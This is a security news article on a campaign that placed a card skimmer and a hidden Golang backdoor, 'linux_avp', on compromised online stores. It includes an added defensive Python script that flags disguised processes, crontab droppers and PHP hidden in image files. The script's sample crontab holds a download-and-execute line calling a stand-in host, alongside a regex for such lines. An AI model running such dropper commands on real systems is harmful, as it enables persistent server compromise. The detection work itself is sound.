
Hackers use Linux backdoor on compromised e-commerce sites with software skimmer

Cyber criminals in China control the malware


Security researchers have revealed a new hacking campaign that installs a Linux backdoor on compromised e-commerce sites after deploying a credit card skimmer on merchant websites.

Researchers from the Sansec Threat Research Team discovered a new malicious agent “linux_avp” that hides as a system process on e-commerce servers. They said hackers have been deploying this malware worldwide since last week, and it takes commands from a control server in Beijing.

In the campaign, hackers started automated e-commerce attack probes, testing for dozens of weaknesses in common online store platforms.

“After a day and a half, the attacker found a file upload vulnerability in one of the store’s plugins. S/he then uploaded a webshell and modified the server code to intercept customer data,” said researchers.

Researchers said the hackers then uploaded the linux_avp malware, a Golang program that, once started, removes itself from disk and disguises itself as a fake ps -ef process.

“Analysis of linux_avp suggests that it serves as a backdoor, waiting for commands from a Beijing (Alibaba) hosted server,” said researchers. The binary also revealed that a user known as "dob" built the backdoor in a project folder named lin_avp, using the code name GREECE.


The malware also installs a malicious crontab entry to preserve access in case the process is killed or the server is rebooted. The crontab entry downloads the Golang malware executable to a random writable directory and installs two configuration files. “One contains a public key, which is presumably used to ensure that no one but the malware owner can launch commands,” researchers added.

This case has another Chinese connection, according to researchers: a line was added to the e-commerce platform code that loads a file called app/design/frontend/favicon_absolute_top.jpg, which contains PHP code to retrieve a fake payment form and inject it into the store. Researchers said the IP address involved was hosted in Hong Kong and had previously been observed as a skimming exfiltration endpoint in July and August of this year.
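The three indicators described above (a process that calls itself ps -ef but whose binary has been unlinked from disk, a crontab entry that downloads and executes a dropper, and an image-named file carrying PHP) can each be checked from a host. The script below is an added illustration, not Sansec's code or anything from the original report; the process records, crontab text and file names it uses are constructed samples, and the stock-tool and system-directory lists are assumptions a defender would tune for their own hosts.

```python
import os
import re

SYSTEM_BIN = ("/bin/", "/usr/bin/", "/sbin/", "/usr/sbin/")
STOCK_TOOLS = {"ps", "sshd", "cron", "crond"}
DROPPER = re.compile(r"\b(curl|wget)\b.*(chmod\s+\+x|\|\s*(sh|bash)\b)")
# Constructed sample records in the shape of /proc/<pid>/cmdline and /proc/<pid>/exe.
SAMPLE_PROCS = [
    {"pid": 4242, "cmdline": "ps -ef", "exe": "/var/tmp/.cache/linux_avp (deleted)"},
    {"pid": 4243, "cmdline": "ps -ef", "exe": "/usr/bin/ps"},
    {"pid": 4244, "cmdline": "nginx: worker process", "exe": "/usr/sbin/nginx"},
]
# Constructed crontab: one legitimate job and one download-then-execute dropper.
SAMPLE_CRONTAB = """\
0 3 * * * /usr/bin/certbot renew --quiet
*/10 * * * * wget -q -O /var/tmp/.u/agent http://dropper.invalid/a && chmod +x /var/tmp/.u/agent && /var/tmp/.u/agent
"""

def live_processes():
    """Read the real process table into the same record shape as SAMPLE_PROCS."""
    procs = []
    for pid in filter(str.isdigit, os.listdir("/proc")):
        try:
            with open(f"/proc/{pid}/cmdline", "rb") as fh:
                cmdline = fh.read().replace(b"\0", b" ").decode(errors="replace").strip()
            exe = os.readlink(f"/proc/{pid}/exe")  # ends in " (deleted)" once the binary is unlinked
        except OSError:
            continue  # process exited, or not ours to inspect
        procs.append({"pid": int(pid), "cmdline": cmdline, "exe": exe})
    return procs

def suspicious_processes(procs):
    """Flag pids whose argv claims to be a stock tool but whose executable was unlinked or is not in a system bin dir."""
    flagged = []
    for p in procs:
        argv0 = os.path.basename(p["cmdline"].split()[0]) if p["cmdline"] else ""
        unlinked = p["exe"].endswith("(deleted)")
        masquerade = argv0 in STOCK_TOOLS and not p["exe"].startswith(SYSTEM_BIN)
        if unlinked or masquerade:
            flagged.append(p["pid"])
    return flagged

def suspicious_cron_lines(crontab_text):
    """Return crontab lines that fetch a file and then chmod +x it or pipe it to a shell."""
    return [line for line in crontab_text.splitlines() if DROPPER.search(line)]

def php_in_image(filename, data):
    """True when a file named like an image (e.g. favicon_absolute_top.jpg) carries PHP source."""
    return filename.lower().endswith((".jpg", ".jpeg", ".png", ".gif", ".ico")) and b"<?php" in data
```

On a real host, pass `live_processes()` to `suspicious_processes()` and the output of `crontab -l` for each user to `suspicious_cron_lines()`; treat any hit as a lead for investigation rather than proof of compromise.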

Researchers said, at the time of writing, no other antivirus vendor had recognized the malware.

“Curiously, one individual had submitted the same malware to Virustotal on Oct 8th with the comment “test”. This was just one day after the successful breach of our customer’s store,” said researchers.

They added that the person who uploaded the malware could very well be its author, wanting to confirm that common antivirus engines would not detect their creation.
